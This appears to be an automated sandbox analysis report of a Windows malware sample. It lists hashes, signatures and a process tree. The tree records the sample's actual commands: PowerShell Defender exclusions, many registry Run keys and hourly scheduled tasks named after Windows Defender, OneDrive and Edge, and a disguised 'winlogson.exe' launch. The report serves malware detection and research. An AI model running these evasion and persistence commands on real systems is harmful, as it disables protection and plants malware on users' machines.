Analysis
-
max time kernel
164s -
max time network
165s -
platform
windows10-1703_x64 -
resource
win10-20220718-en -
resource tags
arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system -
submitted
06-08-2022 07:42
Static task
static1
Behavioral task
behavioral1
Sample
bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe
Resource
win10-20220718-en
General
-
Target
bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe
-
Size
685KB
-
MD5
137046fd04948b262bea42890ae9b52d
-
SHA1
1674e0dac56a9c15d97826ff6928044b94732cf9
-
SHA256
bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7
-
SHA512
bd73d61a23cef1cb438c9c6623a9e990435b4d3edc40247482d2de7b2e51a81980f676c43b3646bee789aa565503dc5647c0f696dc52132597e6cf8f0a99f75e
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
dllhost.exepid process 1932 dllhost.exe -
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
dllhost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe\\Cortana.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\NvStray = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Windows\\System32\\SecurityHealthSystray.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe" dllhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3612 schtasks.exe 32 schtasks.exe 744 schtasks.exe 4084 schtasks.exe 1504 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exedllhost.exepid process 2320 powershell.exe 2320 powershell.exe 2320 powershell.exe 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe 1228 powershell.exe 1228 powershell.exe 1228 powershell.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe 1932 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exebc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exepowershell.exepowershell.exedllhost.exedescription pid process Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 1932 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.execmd.exedllhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3516 wrote to memory of 2236 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe cmd.exe PID 3516 wrote to memory of 2236 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe cmd.exe PID 3516 wrote to memory of 2236 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe cmd.exe PID 2236 wrote to memory of 3856 2236 cmd.exe chcp.com PID 2236 wrote to memory of 3856 2236 cmd.exe chcp.com PID 2236 wrote to memory of 3856 2236 cmd.exe chcp.com PID 2236 wrote to memory of 2320 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 2320 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 2320 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 3768 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 3768 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 3768 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 1228 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 1228 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 1228 2236 cmd.exe powershell.exe PID 3516 wrote to memory of 1932 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe dllhost.exe PID 3516 wrote to memory of 1932 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe dllhost.exe PID 3516 wrote to memory of 1932 3516 bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe dllhost.exe PID 1932 wrote to memory of 3316 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 3316 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 3316 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 4044 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 4044 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 4044 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 3244 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 3244 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 3244 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1192 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1192 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1192 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1464 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1464 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1464 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1052 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1052 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1052 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1204 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1204 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1204 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 4016 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 4016 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 4016 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1956 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1956 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1956 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1568 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1568 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1568 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 312 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 312 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 312 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1628 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1628 1932 dllhost.exe cmd.exe PID 1932 wrote to memory of 1628 1932 dllhost.exe cmd.exe PID 4044 wrote to memory of 744 4044 cmd.exe schtasks.exe PID 4044 wrote to memory of 744 4044 cmd.exe schtasks.exe PID 4044 wrote to memory of 744 4044 cmd.exe schtasks.exe PID 1192 wrote to memory of 4084 1192 cmd.exe schtasks.exe PID 1192 wrote to memory of 4084 1192 cmd.exe schtasks.exe PID 1192 wrote to memory of 4084 1192 cmd.exe schtasks.exe PID 1052 wrote to memory of 1504 1052 cmd.exe schtasks.exe PID 1052 wrote to memory of 1504 1052 cmd.exe schtasks.exe PID 1052 wrote to memory of 1504 1052 cmd.exe schtasks.exe PID 1204 wrote to memory of 3612 1204 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe"C:\Users\Admin\AppData\Local\Temp\bc81e40b4494ca0d530f68820eca22d08548e53e71d870e5ba4a01d63da377c7.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"2⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:3856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:3316
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:744
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:3244
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:4016
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:1464
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk296" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:312
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk1732" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:1628
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk1732" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:32
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk3751" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk5381" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off3⤵PID:2384
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off3⤵PID:1976
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵PID:1160
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
772KB
MD50271b24a3cf061cbd90f06d28c2526bc
SHA1e2750a7965601682137fbe13ce1682f15f7c3141
SHA2563ee5dcdeb10e47a7703b6b38d78a8e4e3b740b020554ae71c59014a2cbbe67ff
SHA5122e568dc2bd44f88c8f8e0d58de5ee3f20575473bc91d57c7fc09a32d9720edb0e622d8eebbb1952708ce09860e715bcac17fff2517299896771747f585631398
-
Filesize
772KB
MD50271b24a3cf061cbd90f06d28c2526bc
SHA1e2750a7965601682137fbe13ce1682f15f7c3141
SHA2563ee5dcdeb10e47a7703b6b38d78a8e4e3b740b020554ae71c59014a2cbbe67ff
SHA5122e568dc2bd44f88c8f8e0d58de5ee3f20575473bc91d57c7fc09a32d9720edb0e622d8eebbb1952708ce09860e715bcac17fff2517299896771747f585631398
-
Filesize
497B
MD513fda2ab01b83a5130842a5bab3892d3
SHA16e18e4b467cde054a63a95d4dfc030f156ecd215
SHA25676973d42c8fceceab7ec85b3d01b218db92564993e93a9bea31c52aa73aeee9e
SHA512c51f9fd6e452fbeeedd4dfaba3c7c887e337f01e68abdd27d4032f8be85def7ef3cf0c77bf60e425b085b76c0539464c6b6e5e805a69397c5519e8ccf9fffccc
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD521602197f78cf6eae9a75e8255126a1e
SHA1c28c6e14287cf6f72fc35f1cb147ee17fb7b5e7e
SHA2567da0602ae98f6e16e2dd853019800091dcf002caa4d147fcb40de59ecaf45044
SHA512531f5f5bcad3977149575b1717152c9a04637741fd6f321cb7f2a6c9d30d5d22ddfeb3ec2493aad31acf7468111cd6c2e85d37fe81717428e86a055cac05a8b8
-
Filesize
18KB
MD59527fa34cff7a8df485c7747b85d839b
SHA1e54b0f40e800668feaf5c2b8eea464aa22079973
SHA2560d454dc18ea4180514c879e1c9016497e88c19f8400561cdd6114bf3f1c4a9b3
SHA512dfb05f9264f82496d370753ed4307930602351bf1bd5925b4661c54c7c58a42447a6421eaed79d55d590a7801e4528eb3494d1e0c4ed1a641bee2cb97a4e2c23